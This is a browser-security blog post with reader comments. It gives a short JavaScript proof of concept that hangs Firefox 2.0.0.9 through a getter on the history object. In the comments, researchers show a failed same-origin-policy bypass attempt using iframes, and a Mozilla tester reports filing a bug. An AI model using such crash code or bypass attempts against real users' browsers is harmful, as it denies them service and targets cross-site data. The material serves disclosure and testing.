Firefox history DOS attack

Here’s a complete DOS attack on Firefox using the history object:-

window.onload = function() {	
	
	history.__defineGetter__("x", function() { 
	 for(i in this) {
	  try {
	   alert(this[i]);
	  } catch(e) {
	 }
        }
       });
	
	history.x;
}

Tested on Firefox 2.0.0.9 mac, a window pops up with two blank buttons and you are unable to do anything without using force quit.

9 Responses to “Firefox history DOS attack”

  1. Awesome AnDrEw writes:

    Nice work, Gareth. I’m really pulling that you figure out a way to break the same origin policy simply because it would be quite impressive.

  2. Gareth Heyes writes:

    Thanks 🙂 yeah that’s my plan, I’m not sure it’s possible because the objects are spoofed getters. I’m having fun trying though

  3. .mario writes:

    Yep – the holy grail of SOP. I’ve been trying various approaches recently but haven’t had any success yet.

    My last attempt was to fill iframes with HTML via this.innerHTML=’payload’ in the src attribute and trying to access the rendered content after a timeout. But Firefox manages to handle it too – any property inside contentWindow is access restricted.

  4. Gareth Heyes writes:

    Here’s my new attempt:-
    window.onload = function() {
    newElement = document.createElement(‘iframe’);
    newElement.src = ‘http://www.google.co.uk/’;
    newElement.id = ‘iframe’;
    newElement.onload = function() {
    var doc = this.contentWindow.document;
    this.__defineGetter__(‘contentWindow’,function() { return doc });
    x = this.contentWindow;
    delete this.contentWindow;
    delete doc;
    alert(x);
    }
    document.body.appendChild(newElement);
    }

    Doesn’t work though 🙁

  5. Gareth Heyes writes:

    Accessing body or innerHTML causes a permission error.

  6. Jesse Ruderman writes:

    Thanks for discovering and reporting this clever way to confuse Firefox with recursion. I’ve filed https://bugzilla.mozilla.org/show_bug.cgi?id=403999 with a clearer testcase — you can use any object, even ({}), in place of the history object.

  7. Gareth Heyes writes:

    Hey Jesse

    No problem! Yeah I figured it would work on any object but the history one was the one I was testing at the time.

  8. Jophn Deo writes:

    Does anyone have a study hint in order to fully appreciate the technical implications?

  9. Jesse Ruderman writes:

    Jophn, I’d start by reading old bugs in bugzilla.mozilla.org about JavaScript recursion limits, and then using those bug reports to find the relevant source code. Once you understand how they work, you might have enough information to fix the bug, or you might not — it might require knowledge of XBL or something. I don’t know, I’m more a tester than a Gecko developer 😉